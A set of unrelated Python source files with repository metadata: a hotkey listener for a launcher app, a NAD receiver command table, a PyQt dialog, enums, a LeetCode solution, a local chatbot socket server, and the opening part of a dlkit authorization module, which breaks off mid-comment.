cdf4a1acc53ac8000703136e7a930c389adce55b | 1,546 | py | Python | KeyHookThread.py | v2okimochi/Keasy | 0c4d480a4b9fc88f47bbc11ed4ca248cbdc488f2 | [
"MIT"
]
| 1 | 2018-10-25T01:31:15.000Z | 2018-10-25T01:31:15.000Z | KeyHookThread.py | v2okimochi/Keasy | 0c4d480a4b9fc88f47bbc11ed4ca248cbdc488f2 | [
"MIT"
]
| 1 | 2018-07-16T01:39:39.000Z | 2018-07-16T01:39:39.000Z | KeyHookThread.py | v2okimochi/Keasy | 0c4d480a4b9fc88f47bbc11ed4ca248cbdc488f2 | [
"MIT"
]
| null | null | null | # -*- coding: utf-8 -*-
from pynput import keyboard
from PyQt5.QtCore import QThread, pyqtSignal
class KeyHooker(QThread):
# シグナル
pushCtrlSignal = pyqtSignal()
releaseCtrlSignal = pyqtSignal()
pushShiftSignal = pyqtSignal()
releaseShiftSignal = pyqtSignal()
pushCommandSignal = pyqtSignal()
releaseCommandSignal = pyqtSignal()
def __init__(self):
super().__init__()
# キーが押された時に発動
# ctrl,shift,spaceなら,それぞれのシグナルを発信
# 他のキーだったら,shiftが離された時のシグナルを発信
# (auto-completeで大文字入力中の誤射ループを防ぐため)
def on_press(self, key):
try:
if key == keyboard.Key.ctrl:
self.pushCtrlSignal.emit()
elif key == keyboard.Key.shift:
self.pushShiftSignal.emit()
elif key == keyboard.Key.cmd_l or key == keyboard.Key.cmd_r:
self.pushCommandSignal.emit()
else:
self.releaseShiftSignal.emit()
except AttributeError:
# キー入力でExceptionが起こるが何もさせない
pass
# キーが離された時に発動
def on_release(self, key):
# print('{0} released'.format(key))
if key == keyboard.Key.ctrl:
self.releaseCtrlSignal.emit()
elif key == keyboard.Key.cmd_l or key == keyboard.Key.cmd_r:
self.releaseCommandSignal.emit()
else:
pass
def run(self):
# globalキーロガー開始
with keyboard.Listener(
on_press=self.on_press,
on_release=self.on_release) as listener:
listener.join()
| 29.730769 | 72 | 0.599612 | 1,656 | 0.943052 | 0 | 0 | 0 | 0 | 0 | 0 | 440 | 0.250569 |
cdf4c8116e9e2bbcc1b35461d7c08335801aaba4 | 2,243 | py | Python | nad_receiver/nad_commands.py | mindigmarton/nad_receiver | 9449699d076011caf560d8c4384a9b1bf2512080 | [
"MIT"
]
| null | null | null | nad_receiver/nad_commands.py | mindigmarton/nad_receiver | 9449699d076011caf560d8c4384a9b1bf2512080 | [
"MIT"
]
| null | null | null | nad_receiver/nad_commands.py | mindigmarton/nad_receiver | 9449699d076011caf560d8c4384a9b1bf2512080 | [
"MIT"
]
| null | null | null | """
Commands and operators used by NAD.
CMDS[domain][function]
"""
CMDS = {
'main':
{
'dimmer':
{'cmd': 'Main.Dimmer',
'supported_operators': ['+', '-', '=', '?']
},
'mute':
{'cmd': 'Main.Mute',
'supported_operators': ['+', '-', '=', '?']
},
'power':
{'cmd': 'Main.Power',
'supported_operators': ['+', '-', '=', '?']
},
'volume':
{'cmd': 'Main.Volume',
'supported_operators': ['+', '-', '=', '?']
},
'ir':
{'cmd': 'Main.IR',
'supported_operators': ['=']
},
'listeningmode':
{'cmd': 'Main.ListeningMode',
'supported_operators': ['+', '-']
},
'sleep':
{'cmd': 'Main.Sleep',
'supported_operators': ['+', '-']
},
'source':
{'cmd': 'Main.Source',
'supported_operators': ['+', '-', '=', '?']
},
'version':
{'cmd': 'Main.Version',
'supported_operators': ['?']
}
},
'tuner':
{
'am_frequency':
{'cmd': 'Tuner.AM.Frequency',
'supported_operators': ['+', '-']
},
'am_preset':
{'cmd': 'Tuner.AM.Preset',
'supported_operators': ['+', '-', '=', '?']
},
'band':
{'cmd': 'Tuner.Band',
'supported_operators': ['+', '-', '=', '?']
},
'fm_frequency':
{'cmd': 'Tuner.FM.Frequency',
'supported_operators': ['+', '-']
},
'fm_mute':
{'cmd': 'Tuner.FM.Mute',
'supported_operators': ['+', '-', '=', '?']
},
'fm_preset':
{'cmd': 'Tuner.FM.Preset',
'supported_operators': ['+', '-', '=', '?']
}
}
}
| 30.310811 | 60 | 0.296478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 963 | 0.429336 |
cdf8455878051f84938cb9a928fc16329abe82f4 | 7,846 | py | Python | ui/Ui_addsite.py | EUFAR/asmm-eufar | 69ede7a24f757392e63f04091e86c50ab129016f | [
"BSD-3-Clause"
]
| null | null | null | ui/Ui_addsite.py | EUFAR/asmm-eufar | 69ede7a24f757392e63f04091e86c50ab129016f | [
"BSD-3-Clause"
]
| 2 | 2015-06-12T09:28:29.000Z | 2015-06-12T09:34:16.000Z | ui/Ui_addsite.py | eufarn7sp/asmm-eufar | 69ede7a24f757392e63f04091e86c50ab129016f | [
"BSD-3-Clause"
]
| null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'addsite.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Addsite(object):
def setupUi(self, Addsite):
Addsite.setObjectName("Addsite")
Addsite.resize(340, 180)
Addsite.setMinimumSize(QtCore.QSize(340, 180))
Addsite.setMaximumSize(QtCore.QSize(340, 16777215))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
Addsite.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("icons/info_icon.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Addsite.setWindowIcon(icon)
Addsite.setStyleSheet("QWidget {\n"
" background-color: rgb(230,230,230);\n"
"}")
self.gridLayout = QtWidgets.QGridLayout(Addsite)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem)
self.label = QtWidgets.QLabel(Addsite)
self.label.setMinimumSize(QtCore.QSize(280, 27))
self.label.setMaximumSize(QtCore.QSize(280, 100))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.label.setFont(font)
self.label.setAlignment(QtCore.Qt.AlignJustify|QtCore.Qt.AlignTop)
self.label.setWordWrap(True)
self.label.setObjectName("label")
self.horizontalLayout_3.addWidget(self.label)
spacerItem1 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem1)
self.gridLayout.addLayout(self.horizontalLayout_3, 0, 0, 1, 2)
spacerItem2 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem2, 1, 0, 1, 1)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem3 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem3)
self.ck_inputLine = QtWidgets.QLineEdit(Addsite)
self.ck_inputLine.setMinimumSize(QtCore.QSize(280, 27))
self.ck_inputLine.setMaximumSize(QtCore.QSize(280, 27))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.ck_inputLine.setFont(font)
self.ck_inputLine.setStyleSheet("QLineEdit {\n"
" border-radius: 3px;\n"
" padding: 1px 4px 1px 4px;\n"
" background-color: rgb(255, 255, 255);\n"
"}")
self.ck_inputLine.setFrame(False)
self.ck_inputLine.setObjectName("ck_inputLine")
self.horizontalLayout_2.addWidget(self.ck_inputLine)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem4)
self.gridLayout.addLayout(self.horizontalLayout_2, 2, 0, 1, 2)
spacerItem5 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
self.gridLayout.addItem(spacerItem5, 3, 1, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem6 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem6)
self.ck_submitButton = QtWidgets.QToolButton(Addsite)
self.ck_submitButton.setMinimumSize(QtCore.QSize(93, 27))
self.ck_submitButton.setMaximumSize(QtCore.QSize(93, 27))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.ck_submitButton.setFont(font)
self.ck_submitButton.setStyleSheet("QToolButton {\n"
" border: 1px solid #acacac;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #f0f0f0, stop:1 #e5e5e5);\n"
"}\n"
"\n"
"QToolButton:hover {\n"
" border: 1px solid #7eb4ea;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #ecf4fc, stop:1 #dcecfc);\n"
"}\n"
"\n"
"QToolButton:pressed {\n"
" border: 1px solid #579de5;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #daecfc, stop:1 #c4e0fc);\n"
"}")
self.ck_submitButton.setObjectName("ck_submitButton")
self.horizontalLayout.addWidget(self.ck_submitButton)
spacerItem7 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem7)
self.ck_cancelButton = QtWidgets.QToolButton(Addsite)
self.ck_cancelButton.setMinimumSize(QtCore.QSize(93, 27))
self.ck_cancelButton.setMaximumSize(QtCore.QSize(93, 27))
font = QtGui.QFont()
font.setFamily("fonts/SourceSansPro-Regular.ttf")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
font.setKerning(True)
font.setStyleStrategy(QtGui.QFont.PreferAntialias)
self.ck_cancelButton.setFont(font)
self.ck_cancelButton.setStyleSheet("QToolButton {\n"
" border: 1px solid #acacac;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #f0f0f0, stop:1 #e5e5e5);\n"
"}\n"
"\n"
"QToolButton:hover {\n"
" border: 1px solid #7eb4ea;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #ecf4fc, stop:1 #dcecfc);\n"
"}\n"
"\n"
"QToolButton:pressed {\n"
" border: 1px solid #579de5;\n"
" border-radius: 1px;\n"
" background-color: qlineargradient(x1:0, y1:0, x2:0, y2:1,\n"
" stop:0 #daecfc, stop:1 #c4e0fc);\n"
"}")
self.ck_cancelButton.setObjectName("ck_cancelButton")
self.horizontalLayout.addWidget(self.ck_cancelButton)
spacerItem8 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem8)
self.gridLayout.addLayout(self.horizontalLayout, 4, 0, 1, 2)
self.retranslateUi(Addsite)
QtCore.QMetaObject.connectSlotsByName(Addsite)
def retranslateUi(self, Addsite):
_translate = QtCore.QCoreApplication.translate
Addsite.setWindowTitle(_translate("Addsite", "Add a new CheckBox"))
self.label.setText(_translate("Addsite", "Please, enter a name for the new Ground Site."))
self.ck_submitButton.setText(_translate("Addsite", "Submit"))
self.ck_cancelButton.setText(_translate("Addsite", "Cancel"))
| 46.702381 | 115 | 0.672827 | 7,607 | 0.969539 | 0 | 0 | 0 | 0 | 0 | 0 | 2,166 | 0.276064 |
cdf8ea07b2a210313250ff1ccb9f4bf6d44a0053 | 1,772 | py | Python | testmile-setu/setu/dispatcher/broker.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
]
| null | null | null | testmile-setu/setu/dispatcher/broker.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
]
| null | null | null | testmile-setu/setu/dispatcher/broker.py | test-mile/setu | b273a11e7f9462e64a370bda16f1952ecdbfb5a5 | [
"Apache-2.0"
]
| null | null | null | from enum import Enum, auto
class SetuGuiAutoActorStateActionType(Enum):
INIT_STATE = auto()
END_STATE = auto()
class SetuGuiAutoActorAutomatorActionType(Enum):
LAUNCH = auto()
QUIT = auto()
GO_TO_URL = auto()
GO_BACK = auto()
GO_FORWARD = auto()
REFRESH = auto()
EXECUTE_JAVASCRIPT = auto()
FIND_ELEMENT = auto()
FIND_MULTIELEMENT = auto()
GET_CURRENT_WINDOW_HANDLE = auto()
GET_WINDOW_TITLE = auto()
MAXIMIZE_WINDOW = auto()
GET_CURRENT_WINDOW_SIZE = auto()
SET_WINDOW_SIZE = auto()
GET_ALL_WINDOW_HANDLES = auto()
SWITCH_TO_WINDOW = auto()
CLOSE_CURRENT_WINDOW = auto()
IS_ALERT_PRESENT = auto()
CONFIRM_ALERT = auto()
DISMISS_ALERT = auto()
GET_TEXT_FROM_ALERT = auto()
SEND_TEXT_TO_ALERT = auto()
GET_CURRENT_VIEW_CONTEXT = auto()
GET_ALL_VIEW_CONTEXTS = auto()
SWITCH_TO_VIEW_CONTEXT = auto()
JUMP_TO_FRAME = auto()
JUMP_TO_PARENT_FRAME = auto()
JUMP_TO_DOM_ROOT = auto()
class SetuGuiAutoActorElementActionType(Enum):
FIND_MULTIELEMENT = auto()
FIND_ELEMENT = auto()
CLICK = auto()
CLEAR_TEXT = auto()
SEND_TEXT = auto()
IS_SELECTED = auto()
IS_VISIBLE = auto()
IS_CLICKABLE = auto()
GET_TAG_NAME = auto()
GET_ATTR_VALUE = auto()
GET_TEXT_CONTENT = auto()
class SetuActorDriverConfigOption(Enum):
GUIAUTO_AUTOMATOR_NAME = auto()
GUIAUTO_CONTEXT = auto()
# Browser (Common)
BROWSER_NAME = auto()
BROWSER_BIN_PATH = auto()
BROWSER_PROXY_ON = auto()
BROWSER_PROXY_HOST = auto()
BROWSER_PROXY_PORT = auto()
MOBILE_OS_NAME = auto()
# Selenium
SELENIUM_DRIVER_PROP = auto()
SELENIUM_DRIVER_PATH = auto()
# Appium
APPIUM_HUB_URL = auto()
APPIUM_AUTO_LAUNCH = auto()
| 23.012987 | 48 | 0.682844 | 1,736 | 0.979684 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.020316 |
cdf8f1196a3909edc36aafce5347c3143f73a6ac | 76 | py | Python | conductor/utils/inputs.py | JoelLefkowitz/conductor | 9a5d3a833c17bd57080e538ea7584620560d9235 | [
"MIT"
]
| 1 | 2021-08-21T21:34:22.000Z | 2021-08-21T21:34:22.000Z | conductor/utils/inputs.py | JoelLefkowitz/conductor | 9a5d3a833c17bd57080e538ea7584620560d9235 | [
"MIT"
]
| null | null | null | conductor/utils/inputs.py | JoelLefkowitz/conductor | 9a5d3a833c17bd57080e538ea7584620560d9235 | [
"MIT"
]
| null | null | null | def prompt(msg: str) -> bool:
return input(msg).lower() in ["y", "yes"]
| 25.333333 | 45 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.105263 |
cdf93d47f329e66522fe3776469675377c2e7349 | 1,758 | py | Python | leetcode/0566_reshape_the_matrix.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
]
| null | null | null | leetcode/0566_reshape_the_matrix.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
]
| null | null | null | leetcode/0566_reshape_the_matrix.py | chaosWsF/Python-Practice | ff617675b6bcd125933024bb4c246b63a272314d | [
"BSD-2-Clause"
]
| null | null | null | """
In MATLAB, there is a very useful function called 'reshape', which can reshape a matrix into
a new one with different size but keep its original data. You're given a matrix represented
by a two-dimensional array, and two positive integers r and c representing the row number and
column number of the wanted reshaped matrix, respectively. The reshaped matrix need to be filled
with all the elements of the original matrix in the same row-traversing order as they were. If
the 'reshape' operation with given parameters is possible and legal, output the new reshaped
matrix; Otherwise, output the original matrix.
Example 1:
Input:
nums = [[1, 2], [3, 4]]
r = 1, c = 4
Output:
[[1, 2, 3, 4]]
Explanation:
The row-traversing of nums is [1, 2, 3, 4]. The new reshaped matrix is a 1 * 4 matrix, fill
it row by row by using the previous list.
Example 2:
Input:
nums = [[1, 2], [3, 4]]
r = 2, c = 4
Output:
[[1, 2], [3, 4]]
Explanation:
There is no way to reshape a 2 * 2 matrix to a 2 * 4 matrix. So output the original matrix.
Note:
1. The height and width of the given matrix is in range [1, 100].
2. The given r and c are all positive.
"""
class Solution:
def matrixReshape1(self, nums, r, c): # 96ms
elements = sum(nums, [])
n = len(elements)
if r * c != n:
return nums
else:
return [elements[i:i+c] for i in range(0, n, c)]
def matrixReshape2(self, nums, r, c): # 88ms
if len(nums[0]) * len(nums) != r * c:
return nums
else:
elements = sum(nums, [])
return [elements[i:i+c] for i in range(0, len(elements), c)]
| 33.807692 | 100 | 0.606371 | 495 | 0.28157 | 0 | 0 | 0 | 0 | 0 | 0 | 1,271 | 0.722981 |
cdfba4673ccb2b05e2ef7ddcaa8aeaa3095e7451 | 4,629 | py | Python | python/main.py | LaraProject/rnn2java | f35b1b98f74864d4310e7866ad5271ae5389292d | [
"MIT"
]
| null | null | null | python/main.py | LaraProject/rnn2java | f35b1b98f74864d4310e7866ad5271ae5389292d | [
"MIT"
]
| null | null | null | python/main.py | LaraProject/rnn2java | f35b1b98f74864d4310e7866ad5271ae5389292d | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import socket
import select
from time import sleep
import message_pb2
from google.protobuf.internal import encoder
import tensorflow as tf
from tensorflow.keras import preprocessing
import pickle
import numpy as np
## RNN part
# Load the inference model
def load_inference_models(enc_file, dec_file):
encoder_model = tf.keras.models.load_model(enc_file)
decoder_model = tf.keras.models.load_model(dec_file)
return (encoder_model, decoder_model)
# Load the tokenizer
def load_tokenizer(tokenizer_file):
with open(tokenizer_file, 'rb') as handle:
tokenizer = pickle.load(handle)
return tokenizer
def load_length(length_file):
with open(length_file, "r") as f:
data = ((f.read()).split(","))
return int(data[0]), int(data[1])
# Talking with our Chatbot
def str_to_tokens( sentence : str, tokenizer, maxlen_questions):
words = sentence.lower().split()
tokens_list = list()
for word in words:
if word in tokenizer.word_index:
tokens_list.append(tokenizer.word_index[word])
else:
tokens_list.append(tokenizer.word_index['<unk>'])
return preprocessing.sequence.pad_sequences([tokens_list],
maxlen=maxlen_questions, padding='post')
def answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
states_values = enc_model.predict(str_to_tokens(question, tokenizer, maxlen_questions))
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = tokenizer.word_index['<start>']
stop_condition = False
decoded_translation = ''
while not stop_condition:
(dec_outputs, h, c) = dec_model.predict([empty_target_seq]
+ states_values)
sampled_word_index = np.argmax(dec_outputs[0, -1, :])
sampled_word = None
for (word, index) in tokenizer.word_index.items():
if sampled_word_index == index:
decoded_translation += ' {}'.format(word)
sampled_word = word
if sampled_word == '<end>' or len(decoded_translation.split()) > maxlen_answers:
stop_condition = True
empty_target_seq = np.zeros((1, 1))
empty_target_seq[0, 0] = sampled_word_index
states_values = [h, c]
return (decoded_translation[:-5]) # remove end w
### END RNN PART ###
PORT = 9987
def recvall(sock):
BUFF_SIZE = 4096 # 4 KiB
data = b''
while True:
part = sock.recv(BUFF_SIZE)
data += part
if len(part) < BUFF_SIZE:
# either 0 or end of data
break
return data
def answer_command(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers):
command = message_pb2.Command()
command.type = message_pb2.Command.ANSWER
command.name = 'ANSWER to "' + question + '"'
command.data = answer(question, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers)
return command
def main():
# Connect over TCP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', PORT))
sock.listen(5)
# Current person
max_lengths = [[22,74]]
person = 1
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
cmd = message_pb2.Command()
over = False
while True and (not over):
conn, addr = sock.accept()
#conn.setblocking(0)
while True:
data = conn.recv(4096)
if not data: break
ready = select.select([conn], [], [], 1.0)
if ready[0]:
data += recvall(conn)
cmd.ParseFromString(data)
if (cmd.type == message_pb2.Command.CommandType.QUESTION):
print("Question : '" + cmd.data + "' received.")
conn.send(answer_command(cmd.data, enc_model, dec_model, tokenizer, maxlen_questions, maxlen_answers).SerializeToString())
print("Question answered.")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.ANSWER):
print("Error, only questions are accepted.")
over = True
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SWITCH_PERSON):
print("Switching to person" + cmd.data)
person = int(cmd.data)
enc_model, dec_model = load_inference_models("../models/" + str(person) + "/model_enc.h5", "../models/" + str(person) + "/model_dec.h5")
tokenizer = load_tokenizer("../models/" + str(person) + "/tokenizer.pickle")
maxlen_questions, maxlen_answers = load_length("../models/" + str(person) + "/length.txt")
conn.close()
break
elif (cmd.type == message_pb2.Command.CommandType.SHUTDOWN):
print("Quiting.")
over = True
conn.close()
break
sleep(1)
sock.close()
if __name__ == '__main__':
main()
| 32.598592 | 140 | 0.712249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 653 | 0.141067 |
cdfbbb1e16902c1d3761509ecf7d21633da2152a | 161,322 | py | Python | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
]
| 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
]
| 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
]
| 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z | """JSON implementations of authorization sessions."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from bson.objectid import ObjectId
from . import objects
from . import queries
from .. import utilities
from ..id.objects import IdList
from ..osid import sessions as osid_sessions
from ..osid.sessions import OsidSession
from ..primitives import DateTime
from ..primitives import Id
from ..primitives import Type
from ..utilities import JSONClientValidated
from ..utilities import PHANTOM_ROOT_IDENTIFIER
from ..utilities import overlap
from dlkit.abstract_osid.authorization import sessions as abc_authorization_sessions
from dlkit.abstract_osid.authorization.objects import AuthorizationForm as ABCAuthorizationForm
from dlkit.abstract_osid.authorization.objects import VaultForm as ABCVaultForm
from dlkit.abstract_osid.id.primitives import Id as ABCId
from dlkit.abstract_osid.osid import errors
from dlkit.abstract_osid.type.primitives import Type as ABCType
DESCENDING = -1
ASCENDING = 1
CREATED = True
UPDATED = True
ENCLOSURE_RECORD_TYPE = Type(
identifier='enclosure',
namespace='osid-object',
authority='ODL.MIT.EDU')
COMPARATIVE = 0
PLENARY = 1
class AuthorizationSession(abc_authorization_sessions.AuthorizationSession, osid_sessions.OsidSession):
"""This is the basic session for verifying authorizations."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
        OsidSession.__init__(self)
        self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
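    # NOTE: the commented-out helpers below appear to be a superseded take on
    # qualifier-hierarchy expansion; the live path now goes through
    # _get_hierarchy_session(), _caching_enabled() and _get_parent_id_list().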
# def _get_qualifier_idstrs(self, qualifier_id):
# def generate_qualifier_ids():
# try:
# authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
# identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
# except:
# return [str(qualifier_id)]
# root_qualifier_id = Id(
# authority=qualifier_id.get_authority(),
# namespace=qualifier_id.get_identifier_namespace(),
# identifier='ROOT')
# if qualifier_id.get_identifier() == 'ROOT':
# return [str(root_qualifier_id)]
# hierarchy_mgr = self._get_provider_manager('HIERARCHY') # local=True ???
# hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
# Id(authority=authority,
# namespace='CATALOG',
# identifier=identifier),
# proxy=self._proxy)
# node = hierarchy_session.get_nodes(qualifier_id, 10, 0, False)
# return self._get_ancestor_idstrs(node) + [str(root_qualifier_id)]
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@mongo')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'hierarchy-qualifier-ids-{0}'.format(str(qualifier_id))
#
# if mc.get(key) is None:
# qualifier_ids = generate_qualifier_ids()
# mc.set(key, qualifier_ids, time=30 * 60)
# else:
# qualifier_ids = mc.get(key)
# else:
# qualifier_ids = generate_qualifier_ids()
# return qualifier_ids
#
# def _get_ancestor_idstrs(self, node):
# def get_ancestors(internal_node):
# node_list = [str(internal_node.get_id())]
# if internal_node.has_parents():
# for parent_node in internal_node.get_parents():
# node_list += self._get_ancestor_idstrs(parent_node)
# return list(set(node_list))
#
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@json')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'ancestor-ids-{0}'.format(str(node.ident))
#
# if mc.get(key) is None:
# ancestor_ids = get_ancestors(node)
# mc.set(key, ancestor_ids, time=30 * 60)
# else:
# ancestor_ids = mc.get(key)
# else:
# ancestor_ids = get_ancestors(node)
# return ancestor_ids
def _get_hierarchy_session(self, hierarchy_id):
"""Returns a hierarchy traversal session for the hierarchy"""
hierarchy_mgr = self._get_provider_manager('HIERARCHY', local=True)
return hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
hierarchy_id,
proxy=self._proxy)
def _caching_enabled(self):
"""Returns True if caching is enabled per configuration, false otherwise."""
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:useCachingForQualifierIds@json')
if config.get_value_by_parameter(parameter_id).get_boolean_value():
return True
else:
return False
except (AttributeError, KeyError, errors.NotFound):
return False
def _get_parent_id_list(self, qualifier_id, hierarchy_id):
"""Returns list of parent id strings for qualifier_id in hierarchy.
        Uses memcache or diskcache if caching is enabled.
"""
if self._caching_enabled():
key = 'parent_id_list_{0}'.format(str(qualifier_id))
# If configured to use memcache as the caching engine, use it.
# Otherwise default to diskcache
caching_engine = 'diskcache'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingEngine@json')
caching_engine = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
if caching_engine == 'memcache':
import memcache
caching_host = '127.0.0.1:11211'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingHostURI@json')
caching_host = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
mc = memcache.Client([caching_host], debug=0)
parent_id_list = mc.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
mc.set(key, parent_id_list)
elif caching_engine == 'diskcache':
import diskcache
with diskcache.Cache('/tmp/dlkit_cache') as cache:
# A little bit non-DRY, since it's almost the same as for memcache above.
# However, for diskcache.Cache, we have to call ".close()" or use a
# ``with`` statement to safeguard calling ".close()", so we keep this
# separate from the memcache implementation.
parent_id_list = cache.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
cache.set(key, parent_id_list)
else:
raise errors.NotFound('The {0} caching engine was not found.'.format(caching_engine))
else:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
return parent_id_list
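    # Illustrative configuration sketch (the registration mechanism depends on
    # the runtime in use and is assumed here, not defined by this module). The
    # caching path above is driven entirely by these runtime parameters:
    #
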